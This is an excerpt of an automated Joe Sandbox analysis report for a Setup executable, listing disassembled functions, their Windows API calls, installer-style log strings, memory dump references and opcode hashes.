                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                  • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                  • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                  • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                  • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                  • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                  • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                  Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                  • wsprintfW.USER32 ref: 00404483
                                                                                                                                  • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                  • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                  • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                  • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  Strings
                                                                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                  • API String ID: 1697273262-1764544995
                                                                                                                                  • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                  • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                  • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                  • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                    • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                    • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                                                                  • API String ID: 2577523808-3778932970
                                                                                                                                  • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                  • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                  • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                  • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                  Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcatwsprintf
                                                                                                                                  • String ID: %02x%c$...
                                                                                                                                  • API String ID: 3065427908-1057055748
                                                                                                                                  • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                  • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                  • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                  • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                  Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                  • API String ID: 2266616436-4211696005
                                                                                                                                  • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                  • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                  • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                  • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,74DF23A0,00000000), ref: 00406902
                                                                                                                                  • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1599320355-0
                                                                                                                                  • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                  • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                  • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                  • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                  Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                  • String ID: Version
                                                                                                                                  • API String ID: 512980652-315105994
                                                                                                                                  • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                  • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                  • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                  • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                  • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                  • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                  • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                  Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2883127279-0
                                                                                                                                  • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                  • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                  • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                  • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                  Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                  • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                  • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                  • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
